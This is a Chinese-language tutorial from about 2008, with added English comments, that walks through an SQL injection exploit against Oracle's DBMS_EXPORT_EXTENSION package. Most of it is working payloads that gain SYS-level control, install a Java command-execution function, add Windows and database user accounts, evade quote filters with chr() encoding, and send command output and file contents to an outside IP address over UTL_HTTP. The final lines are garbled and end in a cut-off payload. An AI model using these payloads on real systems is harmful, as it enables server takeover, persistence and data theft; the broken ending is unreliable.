以下的演示都是在 web 上的 SQL*Plus 里执行的。在 web 注入时，把 select SYS.DBMS_EXPORT_EXTENSION..... 改成
/xxx.jsp?id=1 and '1'<>'a'||(select SYS.DBMS_EXPORT_EXTENSION.....)
的形式即可。（拼上 'a'|| 是为了让整个条件一定返回 true。）
语句有点长，可能要用 POST 提交。
说明：整套方法依赖 SYS.DBMS_EXPORT_EXTENSION 包里的 PL/SQL 注入缺陷——该包以定义者（SYS）权限执行，并且通常对 PUBLIC 可执行，所以 web 应用的普通数据库账号也能触发。据公开资料 Oracle 已在 2006 年的 Critical Patch Update 中修补，只对未打补丁的老版本（8i/9i/10g）有效。
以下是各个步骤:
1. 创建 Java 类
通过注入 SYS.DBMS_EXPORT_EXTENSION 函数，在 Oracle 里以 SYS 身份创建 Java 类 LinxUtil，其中两个静态方法：runCMD 用于执行系统命令（只捕获标准输出），readFile 用于读取文件。注意：这个类和后面创建的函数都会落在 SYS 模式下，是对数据库的持久改动，用完要按第 7 步清理。
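-- Step 1: create the Java class through the DBMS_EXPORT_EXTENSION injection.
-- GET_DOMAIN_INDEX_TABLES splices its third argument into dynamic SQL, so
-- everything after DBMS_OUTPUT".PUT(:P1); is executed as PL/SQL by the
-- SYS-owned package; the objects it creates land in the SYS schema (the page
-- later calls sys.LinxRunCMD).
-- Keep ":P1" literally. The page's own chr()-encoded variant spells it out as
-- chr(58)||chr(80)||chr(49); the "PUT( 1)" seen in some copies is forum
-- software turning ":P" into a smiley, and the payload is not expected to work
-- without the placeholder.
-- Quote nesting: '' is one level deep (inside the payload string), '''' two
-- levels (inside the inner EXECUTE IMMEDIATE), so the Java source itself needs
-- no quote doubling.
-- runCMD() captures only stdout (getInputStream()); stderr is dropped.
-- Both methods return the whole output as one String that Oracle maps to a
-- varchar2, so very long output is likely to be rejected or truncated.
/xxx.jsp?id=1 and '1'<>'a'||(
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}public static String readFile(String filename){try{BufferedReader myReader= new BufferedReader(new FileReader(filename)); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}
}'''';END;'';END;--','SYS',0,'1',0) from dual
)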
------------------------
如果 URL 有长度限制，可以把 readFile() 方法去掉，即：
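-- Step 1, short form: same injection as above but the Java class only carries
-- runCMD(), for injection points with a URL length limit.
-- ":P1" must stay as the bind placeholder (see the chr()-encoded variant later
-- on this page, which encodes it as chr(58)||chr(80)||chr(49)).
-- Only stdout of the spawned process is captured; stderr is dropped.
/xxx.jsp?id=1 and '1'<>'a'||(
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}
}'''';END;'';END;--','SYS',0,'1',0) from dual
)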
同时把后面步骤中所有涉及 readFile() / LinxReadFile 的语句去掉。
------------------------------
2. 授予 Java 权限（Runtime.exec() 需要 java.io.FilePermission 的 execute 动作。这里授给的是 PUBLIC，等于库里所有账号都拿到了这个权限，清理时记得用 dbms_java.revoke_permission 收回。）
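-- Step 2: grant the Java permission the class needs. Runtime.exec() is checked
-- against java.io.FilePermission with the "execute" action, which is what this
-- grants for <<ALL FILES>>. readFile() uses FileReader, which is governed by
-- the "read" action and is not covered here -- if readFile() comes back with a
-- java.security.AccessControlException, that is the reason.
-- The grantee is PUBLIC, i.e. every account in the database, not just the one
-- used by the injection. Eight quotes = three nesting levels deep.
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''begin dbms_java.grant_permission( ''''''''PUBLIC'''''''', ''''''''SYS:java.io.FilePermission'''''''', ''''''''<<ALL FILES>>'''''''', ''''''''execute'''''''' );end;'''';END;'';END;--','SYS',0,'1',0) from dual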
3. 创建调用 Java 方法的 PL/SQL 函数
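-- Step 3: PL/SQL call specs that expose the two static Java methods as SQL
-- functions in the SYS schema. The NAME string sits three nesting levels deep,
-- hence the eight quotes around it.
-- The function names are unquoted, so Oracle stores them upper-cased
-- (LINXRUNCMD, LINXREADFILE); the quoted Java name "LinxUtil" keeps its case.
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
create or replace function LinxRunCMD(p_cmd in varchar2) return varchar2 as language java name ''''''''LinxUtil.runCMD(java.lang.String) return String''''''''; '''';END;'';END;--','SYS',0,'1',0) from dual
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
create or replace function LinxReadFile(filename in varchar2) return varchar2 as language java name ''''''''LinxUtil.readFile(java.lang.String) return String''''''''; '''';END;'';END;--','SYS',0,'1',0) from dual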
* R' {8 m$ {# l9 A0 G4.赋public执行函数的权限
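-- Step 4: let every account call the wrappers. EXECUTE is the privilege the
-- later sys.LinxRunCMD(...) calls need; the original used GRANT ALL, which on a
-- function only adds DEBUG on top of EXECUTE.
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant execute on LinxRunCMD to public'''';END;'';END;--','SYS',0,'1',0) from dual
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant execute on LinxReadFile to public'''';END;'';END;--','SYS',0,'1',0) from dual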
5. 测试上面几步是否成功（函数名没加引号，入库后是大写，所以这里按大写查）
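-- Step 5: boolean probes. If the subquery finds the object the comparison is
-- true and the page renders normally; if it finds nothing the comparison is
-- NULL and the page shows no row.
-- Unquoted identifiers are folded to upper case, hence LINXRUNCMD/LINXREADFILE.
-- rownum = 1 guards against ORA-01427 should a synonym or a second object of
-- the same name be visible.
and '1'<>'11'||(
select OBJECT_ID from all_objects where object_name ='LINXRUNCMD' and rownum = 1
)
and '1'<>(
select OBJECT_ID from all_objects where object_name ='LINXREADFILE' and rownum = 1
)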
6. 执行命令（这种写法只是把函数跑起来，页面上看不到输出；要看结果用下面的 union 或 UTL_HTTP）：
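-- Step 6: run a command / read a file. The condition is only a carrier: it is
-- true whenever the function returns something other than '1', so nothing of
-- the output is displayed -- it has to be read back with union or UTL_HTTP.
-- Both examples are Windows-specific (cmd /c, c:/boot.ini), and
-- "net user linx /add" creates a persistent local account on the database host.
-- Runtime.exec(String) splits the command on whitespace, so quoted arguments
-- do not survive; keep commands simple or wrap them in cmd /c.
/xxx.jsp?id=1 and '1'<>(
select sys.LinxRunCMD('cmd /c net user linx /add') from dual
)
/xxx.jsp?id=1 and '1'<>(
select sys.LinxReadFile('c:/boot.ini') from dual
)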
3 u, w9 {" j! k1 g7 [, C
注意 sys.LinxReadFile() 返回的是 varchar2 类型，不能用 "and 1<>" 代替 "and '1'<>"：文件内容无法隐式转成数字，会报 ORA-01722。
如果要查看运行结果可以用 union（union 两边的列数和类型必须一致，原查询列多时要用 null 或常量补齐）：
-- In-band read-back. The injected UNION must produce the same number of
-- columns, with compatible types, as the application's own query (pad with
-- NULLs or literals when it selects more than one), otherwise Oracle raises
-- ORA-01789 / ORA-01790. LinxRunCMD returns varchar2, so the column it lands
-- in must be a string column.
/xxx.jsp?id=1 union select sys.LinxRunCMD('cmd /c net user linx /add') from dual
或者用 UTL_HTTP.request() 把结果带外发到自己控制的主机（数据库主机必须能出站访问 HTTP）：
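-- Out-of-band read-back: the function result is appended to a URL that the
-- database host fetches with UTL_HTTP, so the receiving web server's log gets it.
-- Oracle SQL has no backslash escapes: '\n' is the two characters \ and n, so
-- the original REPLACE(..., '\n', '%0A') never matched the line feeds that
-- runCMD()/readFile() append. chr(10) is the actual line feed.
-- Only space and LF are encoded here; other reserved characters in the output
-- (&, #, %, +) still break the URL -- utl_url.escape() or a base64 wrapper is
-- the robust option.
-- Needs outbound HTTP from the database host; newer Oracle releases also gate
-- UTL_HTTP behind a network ACL.
/xxx.jsp?id=1 and '1'<>(
SELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(REPLACE(sys.LinxRunCMD('cmd /c net user aaa /del'),' ','%20'),chr(10),'%0A')) FROM dual
)
/xxx.jsp?id=1 and '1'<>(
SELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(REPLACE(sys.LinxReadFile('c:/boot.ini'),' ','%20'),chr(10),'%0A')) FROM dual
)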
注意：用 UTL_HTTP.request 时，要用 REPLACE() 把空格、换行符替换掉，否则无法提交 HTTP 请求。换行要写成 chr(10)——Oracle SQL 里的 '\n' 只是反斜杠和 n 两个字符，不是换行，按原文写法换行根本不会被替换。更稳妥的是用 utl_url.escape()，或者用 utl_encode.base64_encode（它接受 RAW：先 utl_raw.cast_to_raw()，结果再 utl_raw.cast_to_varchar2() 转回字符串）。另外 UTL_HTTP 需要数据库主机能出站访问，11g 起还要有网络 ACL 才允许。
--------------------
内部变化
通过以下查询可以在 all_objects 视图里看到新增的对象：
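-- What the steps above left behind. Unquoted names were folded to upper case
-- (LINXRUNCMD, LINXREADFILE); the quoted Java source "LinxUtil" kept its case,
-- hence the second pattern. Explicit columns instead of SELECT *.
select owner, object_name, object_type, status, created
from all_objects
where object_name like '%LINX%' or object_name like '%Linx%'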
7. 删除我们创建的对象（只删 LinxRunCMD 不够：LinxReadFile、Java 源 "LinxUtil" 和第 2 步授给 PUBLIC 的 Java 权限也要清掉）
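-- Step 7: clean-up. The original only dropped LinxRunCMD; LinxReadFile, the
-- Java source "LinxUtil" and the PUBLIC Java permission from step 2 would
-- otherwise stay behind in SYS. Same injection carrier for each statement.
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
drop function LinxRunCMD '''';END;'';END;--','SYS',0,'1',0) from dual
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
drop function LinxReadFile '''';END;'';END;--','SYS',0,'1',0) from dual
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
drop java source "LinxUtil" '''';END;'';END;--','SYS',0,'1',0) from dual
-- Revoke the FilePermission granted to PUBLIC in step 2 (same arguments as the grant).
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''begin dbms_java.revoke_permission( ''''''''PUBLIC'''''''', ''''''''SYS:java.io.FilePermission'''''''', ''''''''<<ALL FILES>>'''''''', ''''''''execute'''''''' );end;'''';END;'';END;--','SYS',0,'1',0) from dual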
====================================================
全文结束。谨以此文赠与我的朋友。
linx
124829445
2008.1.12
linyujian@bjfu.edu.cn
======================================================================
测试漏洞的另一方法：
创建 Oracle 账号（口令和用户名相同，只用来证明注入的 DDL 确实以 SYS 执行了，测完要删）：
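-- Alternative proof that the injection works: create a throw-away database
-- account (trivial password, no privileges yet). ":P1" stays as the bind
-- placeholder; the chr()-encoded form below encodes it the same way.
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
CREATE USER linxsql IDENTIFIED BY linxsql'''';END;'';END;--','SYS',0,'1',0) from dual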
即（把每个参数都用 chr() 拼出来，适用于注入点过滤引号的情况；注意其中 chr(40)||chr(58)||chr(80)||chr(49)||chr(41) 就是 (:P1)）：
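-- Same CREATE USER payload with every argument built from chr(), for injection
-- points that reject quote characters. Because no literal quotes are involved,
-- the nesting is one level shallower than in the quoted form: the outer
-- EXECUTE IMMEDIATE string is delimited by chr(39) and the inner one by
-- chr(39)||chr(39). Decoded, the third argument reads
--   DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE 'DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''CREATE USER linxsql IDENTIFIED BY linxsql'';END;';END;--
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(chr(70)||chr(79)||chr(79),chr(66)||chr(65)||chr(82),
chr(68)||chr(66)||chr(77)||chr(83)||chr(95)||chr(79)||chr(85)||chr(84)||chr(80)||chr(85)||chr(84)||chr(34)||chr(46)||chr(80)||chr(85)||chr(84)||chr(40)||chr(58)||chr(80)||chr(49)||chr(41)||chr(59)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(68)||chr(69)||chr(67)||chr(76)||chr(65)||chr(82)||chr(69)||chr(32)||chr(80)||chr(82)||chr(65)||chr(71)||chr(77)||chr(65)||chr(32)||chr(65)||chr(85)||chr(84)||chr(79)||chr(78)||chr(79)||chr(77)||chr(79)||chr(85)||chr(83)||chr(95)||chr(84)||chr(82)||chr(65)||chr(78)||chr(83)||chr(65)||chr(67)||chr(84)||chr(73)||chr(79)||chr(78)||chr(59)||chr(66)||chr(69)||chr(71)||chr(73)||chr(78)||chr(32)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(39)||chr(67)||chr(82)||chr(69)||chr(65)||chr(84)||chr(69)||chr(32)||chr(85)||chr(83)||chr(69)||chr(82)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(32)||chr(73)||chr(68)||chr(69)||chr(78)||chr(84)||chr(73)||chr(70)||chr(73)||chr(69)||chr(68)||chr(32)||chr(66)||chr(89)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(39)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(45)||chr(45),chr(83)||chr(89)||chr(83),0,chr(49),0) from dual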
确定漏洞存在（all_users 对所有账号可见；查不到行时比较结果为 NULL，页面不返回数据）：
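-- Confirmation probe: ALL_USERS is readable by every account. USER_ID is a
-- number, so the numeric comparison is fine here; when the user does not
-- exist the subquery yields NULL and the condition is not true.
1<>(
select user_id from all_users where username='LINXSQL'
)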
给 linxsql 连接权限（CREATE SESSION 通过 CONNECT 角色授予，之后就能直接用这个账号登录数据库）：
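-- Give the throw-away account the CONNECT role so it can log in directly.
-- Same injection carrier; ":P1" is the bind placeholder.
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
GRANT CONNECT TO linxsql'''';END;'';END;--','SYS',0,'1',0) from dual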
删除账号：
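-- Remove the test account again. DROP USER fails with ORA-01922 if the schema
-- owns objects; add CASCADE in that case.
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
drop user LINXSQL'''';END;'';END;--','SYS',0,'1',0) from dual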
======================
以下方法创建一个可以执行任意语句的函数 Linx_query()，执行成功的话返回数值 1。但它声明为 authid current_user（调用者权限），execute immediate 只拥有调用者自己的权限，可能仅仅是 PUBLIC 级别，作用似乎不大；真的要用的话可以考虑 grant dba to 当前的 User。另外从 SELECT 里调用的函数不能做 DDL/DML（会报 ORA-14551），所以函数体里需要 pragma autonomous_transaction：
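-- Invoker-rights helper that runs an arbitrary statement and returns 1.
-- authid current_user means EXECUTE IMMEDIATE runs with the caller's
-- privileges, not SYS's (the page itself notes this limits its usefulness).
-- A function invoked from a SELECT may not perform DDL or DML (ORA-14551)
-- unless it runs in an autonomous transaction, so the pragma is added -- the
-- same pattern the other payloads on this page already use -- and the
-- autonomous transaction is committed before returning (required, otherwise
-- ORA-06519).
1.jsp?id=1 and '1'<>(
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
create or replace function Linx_query (p varchar2) return number authid current_user is pragma autonomous_transaction; begin execute immediate p; commit; return 1; end; '''';END;'';END;--','SYS',0,'1',0) from dual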
~, x1 n. x# E) and ... 1.jsp?id=1 and '1'( select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT.PUT(:P1);EXECUTE IMMEDIATE; Z! R/ h$ L$ X$ x2 V
)! X0 w: F5 [5 N5 ~! }
' `4 F2 j0 h* ~9 @/ F8 e7 q
0 h3 J" r7 O# p! Y7 e2 U% r* o: b% W6 ~4 Y8 F
|